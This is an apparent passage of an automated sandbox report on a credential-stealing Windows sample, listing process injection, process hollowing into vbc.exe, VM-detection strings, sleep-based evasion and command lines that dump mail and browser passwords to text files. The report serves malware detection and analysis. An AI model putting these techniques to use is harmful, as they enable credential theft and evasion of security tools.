                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe, 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: FukQGQj7cl.exeVirustotal: Detection: 45%
                  Source: FukQGQj7cl.exeReversingLabs: Detection: 35%
                  Source: unknownProcess created: C:\Users\user\Desktop\FukQGQj7cl.exe 'C:\Users\user\Desktop\FukQGQj7cl.exe'
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: FukQGQj7cl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: FukQGQj7cl.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: FukQGQj7cl.exeStatic file information: File size 1245696 > 1048576
                  Source: FukQGQj7cl.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x12f800
                  Source: FukQGQj7cl.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                  Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000000.297962667.0000000000D62000.00000002.00020000.sdmp, InstallUtil.exe.1.dr
                  Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
                  Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, InstallUtil.exe, 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, vbc.exe
                  Source: Binary string: InstallUtil.pdb source: FukQGQj7cl.exe, 00000001.00000003.299838271.0000000006CE4000.00000004.00000001.sdmp, InstallUtil.exe, InstallUtil.exe.1.dr
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 16_2_02E4E672 push esp; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00411879 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_004118A0 push eax; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_004118A0 push eax; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00442871 push ecx; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00442A90 push eax; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00442A90 push eax; ret
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00446E54 push eax; ret
                  Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, q6G4/b6TJ.csHigh entropy of concatenated method names: '.ctor', 'q0H7', 'Gm6g', 'f1JA', 'Hk3b', 'w8Y2', 'Py2m', 'Zw37', 'n6J5', 'w5D0'
                  Source: 1.2.FukQGQj7cl.exe.a70000.0.unpack, x7H1/Cd25.csHigh entropy of concatenated method names: '.ctor', 'Pk4f', 'Tc58', 'Hp8w', 'Ho5e', 'f2SK', 'y7R4', 'm7ZL', 'Zd1t', 'e9Y8'
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile created: C:\Users\user\AppData\Local\Temp\InstallUtil.exeJump to dropped file

                  Hooking and other Techniques for Hiding and Protection:

                  barindex
                  Changes the view of files in windows explorer (hidden files and folders)Show sources
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
                  Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeFile opened: C:\Users\user\Desktop\FukQGQj7cl.exe\:Zone.Identifier read attributes | delete
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion:

                  barindex
                  Yara detected AntiVM3Show sources
                  Source: Yara matchFile source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeWindow / User API: threadDelayed 390
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeWindow / User API: threadDelayed 9400
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 6020Thread sleep time: -20291418481080494s >= -30000s
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 1092Thread sleep count: 390 > 30
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 1092Thread sleep count: 9400 > 30
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exe TID: 6020Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6396Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6644Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6648Thread sleep time: -140000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 6652Thread sleep time: -54600s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 7032Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_004161B0 memset,GetSystemInfo,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeThread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 120000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 140000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeThread delayed: delay time: 180000
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: VMware
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware vmci bus device!vmware virtual s scsi disk device
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware svga
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vboxservice
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-Vmicrosoft
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware usb pointing device
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmusrvc
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware pointing device
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware sata
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmsrvc
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmtools
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware virtual s scsi disk device
                  Source: FukQGQj7cl.exe, 00000001.00000002.314280605.0000000002FDF000.00000004.00000001.sdmpBinary or memory string: vmware vmci bus device
                  Source: FukQGQj7cl.exe, 00000001.00000002.310032279.000000000137F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                  Sample uses process hollowing techniqueShow sources
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Writes to foreign memory regionsShow sources
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeMemory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: ECE008
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
